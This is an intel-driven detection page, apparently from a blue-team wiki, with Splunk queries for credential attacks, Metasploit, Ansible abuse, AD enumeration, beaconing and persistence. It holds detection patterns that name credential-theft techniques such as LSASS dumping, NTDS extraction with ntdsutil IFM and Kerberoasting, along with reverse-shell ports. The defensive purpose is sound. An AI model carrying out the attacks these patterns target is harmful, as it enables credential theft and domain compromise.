CyHelp Intel-Driven Detection
Intel-Driven Detection

Targeted Monitoring

Important · read first This page is not a complete monitoring catalogue. It contains specific detections derived from the intelligence we received about the red team's planned techniques · credential attacks, Metasploit RC chains, Ansible-driven automation, AD enumeration, and network beaconing. Treat it as an extension of, not a replacement for, the general dashboards and alerts in Dashboards & Alerts.

Credential Attacks

LSASS access by a non-system process (Mimikatz)

Mimikatz reads lsass.exe memory to extract NTLM hashes and Kerberos tickets. Sysmon Event 10 records every cross-process memory access — anything from a non-Windows binary touching LSASS is highly suspicious.

Detect (SPL)
Sysmon Event 10 · LSASS access
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  EventCode=10
  TargetImage="*\\lsass.exe"
  GrantedAccess IN ("0x1010", "0x1410", "0x1438", "0x143a", "0x147a", "0x1fffff")
  SourceImage!="*\\Windows\\System32\\*"
  SourceImage!="*\\Windows\\WinSxS\\*"
  SourceImage!="*\\WindowsDefender\\*"
| table _time, ComputerName, SourceImage, GrantedAccess, User

Kerberoasting · Event 4769 with RC4 (0x17)

Any domain user can request service tickets (TGS) for SPNs. The red team requests many in a row, then cracks them offline. RC4 is the giveaway · modern Windows defaults to AES.

Detect (SPL)
4769 RC4 burst
index=wineventlog EventCode=4769
  Ticket_Encryption_Type="0x17"
  Service_Name!="krbtgt"
  Account_Name!="*$"
| bucket _time span=5m
| stats dc(Service_Name) as spns_requested, count
         by _time, Account_Name, Client_Address
| where spns_requested > 5

AS-REP Roasting · Event 4768 with RC4

Targets accounts with "Do not require Kerberos preauthentication" set. The TGT response is encrypted with the user's password hash · same offline-cracking attack as Kerberoasting.

Detect (SPL)
4768 RC4
index=wineventlog EventCode=4768
  Ticket_Encryption_Type="0x17"
  PreAuthType="0"
| table _time, Account_Name, Client_Address, Ticket_Encryption_Type
Tip PreAuthType=0 means preauth was not required — that's the AS-REP-roastable account.

Pass-the-Hash · Logon Type 3 with NTLM

A stolen NTLM hash is replayed against another host. Network logon (Type 3) using NTLM, especially from a workstation toward a server, is the classic signature.

Detect (SPL)
4624 Logon_Type=3 NTLM
index=wineventlog EventCode=4624
  Logon_Type=3
  Authentication_Package="NTLM"
  Account_Name!="ANONYMOUS LOGON"
  Account_Name!="*$"
| stats count by Account_Name, src_ip, ComputerName, Workstation_Name
| sort -count

Golden Ticket / krbtgt access

Any direct ticket activity for the krbtgt account · or RC4-encrypted TGTs with non-standard fields · suggests Golden Ticket forgery or replay.

Detect (SPL)
krbtgt anomalies
# Direct activity against krbtgt
index=wineventlog (EventCode=4769 OR EventCode=4768)
  Service_Name="krbtgt"
| table _time, Account_Name, Client_Address, EventCode, Ticket_Encryption_Type

# Anomalous TGT lifetime / RC4 use post-AES-baseline
index=wineventlog EventCode=4769
  Ticket_Encryption_Type="0x17"
  Account_Name!="*$"
| stats count by Account_Name, Service_Name, Client_Address

Metasploit

Outbound on default MSF ports (4443 / 4444 / 4445)

Default reverse shell listeners. Egress filter your network to deny these by default · then alert on any attempt that does occur.

Detect (SPL)
Network · MSF default ports
index=network (dest_port=4443 OR dest_port=4444 OR dest_port=4445)
| stats count, values(dest_ip) as dest_ips by src_ip, dest_port
| sort -count

Suspicious children of msfconsole / .rb scripts

The red team's resource scripts (Delfino / Stambecco / Bigi) execute as .rb files driven by msfconsole. Watch for the parent-child chain.

Detect (SPL)
Linux · ruby/msfconsole + child
# Linux auditd / Sysmon-for-Linux
index=main sourcetype=auditd OR sourcetype=sysmon_linux
  (parent_image="*msfconsole*" OR parent_image="*ruby*" OR command="*.rb*")
| stats count by host, parent_image, image, command
| sort -count

Staged Meterpreter payload

Staged payloads pull a second-stage DLL/shellcode from the C2 over HTTP/HTTPS. Look for the small initial GET (typical 1k–4k response) followed quickly by an outbound shell session.

Detect (SPL)
Web proxy · Meterpreter URI patterns
index=proxy OR index=web
  (uri="/INITM*" OR uri="/INITJM*" OR uri_path="*[A-Z0-9]{4,5}.*")
  status=200 bytes < 10000
| stats count, values(uri) as uris by src_ip, dest_ip
| where count > 2
Tip Suricata / Snort with the ET TROJAN ruleset catches most stagers natively. If you have it, just feed the alerts into Splunk and watch index=ids.

Post-exploitation: process migration & token impersonation

After landing, MSF migrates into a long-lived process (e.g. explorer.exe) or impersonates a token. The signal is a remote thread injection (Sysmon Event 8) into a non-system process, or unexpected SeImpersonatePrivilege use.

Detect (SPL)
Sysmon Event 8 + token events
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  EventCode=8
  TargetImage IN ("*\\explorer.exe", "*\\svchost.exe", "*\\winlogon.exe")
  SourceImage!="*\\System32\\*"
| stats count by ComputerName, SourceImage, TargetImage

Ansible / Automation

Mass SSH connections from a single source

Ansible drives many hosts from one controller — legitimate, but the same pattern is what an attacker who's compromised the controller will produce. Baseline the controller's IP; alert on any other source fanning out.

Detect (SPL)
SSH fan-out
index=main sourcetype=linux_secure "Accepted" earliest=-15m
| stats dc(host) as distinct_targets, count by src_ip
| where distinct_targets > 5 AND src_ip!="<ANSIBLE_CTRL_IP>"
| sort -distinct_targets

Execution of .rb from non-standard paths

Legitimate Ruby/Ansible runs out of system paths. .rb in /tmp, /var/tmp, /dev/shm, or a user home directory is a strong signal.

Detect (SPL)
auditd · .rb in suspicious paths
index=main sourcetype=auditd type=EXECVE
  command="*.rb*"
  (command="*/tmp/*" OR command="*/var/tmp/*"
   OR command="*/dev/shm/*" OR command="*/home/*")
| table _time, host, user, command

File creation in /tmp or %TEMP% followed by immediate execution

Drop-and-run pattern. The file is written, then the same file is invoked within seconds — common to many implants and post-exploitation modules.

Detect (SPL)
Sysmon · drop-and-run
# Sysmon: file create (11) followed quickly by process create (1) on the same path
index=wineventlog sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
  (EventCode=11 OR EventCode=1)
  (TargetFilename="*\\Temp\\*" OR TargetFilename="*\\AppData\\Local\\Temp\\*"
   OR Image="*\\Temp\\*" OR Image="*\\AppData\\Local\\Temp\\*")
| eval path=coalesce(TargetFilename, Image)
| stats earliest(_time) as first, latest(_time) as last,
         values(EventCode) as evts by ComputerName, path
| where mvcount(evts)=2 AND (last - first) < 10

Active Directory

Unusual access to the Domain Controller

Logons or admin-share access on the DC from anything other than known Tier-0 admins is high-priority.

Detect (SPL)
DC logons / share access
index=wineventlog ComputerName="*DC*"
  (EventCode=4624 Logon_Type IN (2,10))
  Account_Name!="*$"
| stats count by Account_Name, src_ip, Logon_Type
| where Account_Name!="<known_tier0_admin>"

AD backup requests · ntdsutil / vssadmin / wbadmin

The intel-named "BackupPriv" path. Any of these binaries firing on a DC, especially with arguments like create shadow or ifm, demands immediate attention.

Detect (SPL)
Backup-tool process create
index=wineventlog (EventCode=4688 OR EventCode=1)
  (New_Process_Name="*ntdsutil*"
   OR New_Process_Name="*vssadmin*"
   OR New_Process_Name="*wbadmin*"
   OR New_Process_Name="*diskshadow*")
  (Process_Command_Line="*ifm*"
   OR Process_Command_Line="*create shadow*"
   OR Process_Command_Line="*ntds*")
| table _time, ComputerName, User, New_Process_Name, Process_Command_Line

Large LDAP queries (AD enumeration)

BloodHound / SharpHound and similar tools issue long, complex LDAP filters that pull thousands of objects. Normal applications query a handful.

Detect (SPL)
4662 / Directory Service queries
# Requires "Audit Directory Service Access" enabled on DC
index=wineventlog ComputerName="*DC*"
  (EventCode=4662 OR EventCode=1644)
| bucket _time span=10m
| stats count by _time, Account_Name, src_ip
| where count > 500

Account creation or privileged group modification

4720 = user created · 4732 = added to a security-enabled local group · 4756 = added to universal group. The combo of the two within minutes is a classic privilege-escalation signal.

Detect (SPL)
4720 / 4732 / 4756 burst
index=wineventlog
  (EventCode=4720 OR EventCode=4732 OR EventCode=4728 OR EventCode=4756)
| bucket _time span=10m
| stats values(EventCode) as events,
         count by _time, Target_Account_Name, ComputerName
| where mvcount(events) > 1

Network

Regular beacons to external IPs (C2)

C2 traffic is often quiet but periodic · the same internal host hitting the same external endpoint at near-constant intervals (with low jitter). Look for low-variance time deltas.

Detect (SPL)
Beacon detection · time-delta variance
index=network earliest=-2h dest_ip!="10.0.0.0/8" dest_ip!="192.168.0.0/16"
| sort 0 src_ip, dest_ip, _time
| streamstats current=t window=2
         range(_time) as delta by src_ip, dest_ip
| stats count, stdev(delta) as jitter, avg(delta) as avg_delta
         by src_ip, dest_ip
| where count > 10 AND jitter < 5 AND avg_delta > 15
| sort jitter

web2pdf · suspicious User-Agent on outbound HTTP

The intel mentions web2pdf as a known beacon vector. Most legitimate clients use a recognisable User-Agent (browser, curl, wget, Splunk, etc.). Anything labelled web2pdf or unrecognised should be inspected.

Detect (SPL)
web2pdf / odd User-Agent
index=proxy OR index=web
  (useragent="*web2pdf*"
   OR useragent=""
   OR useragent="-"
   OR useragent="*python-requests*"
   OR useragent="*Go-http-client*")
| stats count, values(uri) as uris by src_ip, dest_ip, useragent
| sort -count

Lateral movement · cascading SMB / WinRM / RDP

The attacker pivots host-to-host. From the Splunk side it looks like A→B then quickly B→C on the same admin protocols.

Detect (SPL)
Internal admin-port chain
index=network
  dest_port IN (445, 3389, 5985, 5986)
  src_ip="10.0.0.0/8" dest_ip="10.0.0.0/8"
  earliest=-30m
| stats dc(dest_ip) as distinct_targets,
         values(dest_port) as ports by src_ip
| where distinct_targets > 3

Unusual DNS activity · exfiltration / recent domains

DNS exfiltration shows as long, high-entropy subdomain labels. Newly-registered domains are common for C2.

Detect (SPL)
Long / high-entropy DNS queries
index=dns
| eval qlen=len(query), label=mvindex(split(query, "."), 0)
| eval label_len=len(label)
| where qlen > 60 OR label_len > 30
| stats count, values(query) as queries by src_ip
| sort -count
Tip For "recent domain" detection, enrich with a WHOIS or threat-intel lookup feeding a Splunk lookup table; then filter on domain_age < 30d.

General

PowerShell with -EncodedCommand or -NoProfile

Both flags are heavily used by attackers. -enc hides the actual command; -NoProfile avoids logging hooks set in user profiles.

Detect (SPL)
4688 PowerShell flags
index=wineventlog EventCode=4688
  New_Process_Name="*powershell*"
  (Process_Command_Line="*-enc*"
   OR Process_Command_Line="*-EncodedCommand*"
   OR Process_Command_Line="*-NoProfile*"
   OR Process_Command_Line="*-nop*")
| table _time, ComputerName, User, Process_Command_Line

Creation of unusual services or scheduled tasks

Persistence mechanism #1. New service (Event 7045) outside patch windows, or a scheduled task running an unsigned binary or PowerShell, is high-priority.

Detect (SPL)
7045 + scheduled-task creation
# New service installations
index=wineventlog EventCode=7045
| table _time, ComputerName, ServiceName, ServiceFileName, ServiceStartType

# Scheduled task creation (4698)
index=wineventlog EventCode=4698
| rex field=Message "<Command>(?<cmd>[^<]+)</Command>"
| table _time, ComputerName, Subject_User_Name, TaskName, cmd

Abnormal volume of authentications · brute-force / spray

Spray attacks are slow per account but loud in aggregate · many failed logins across different accounts from one source (low-and-slow), or many fails for one account in a short window (classic brute-force).

Detect (SPL)
Auth volume · spray detection
# Password spray: many DIFFERENT users failing from one source
index=wineventlog EventCode=4625 earliest=-30m
| stats dc(Account_Name) as users, count by src_ip
| where users > 10

# Brute-force: many fails for one user in 5 min
index=wineventlog EventCode=4625
| bucket _time span=5m
| stats count by _time, Account_Name, src_ip
| where count > 15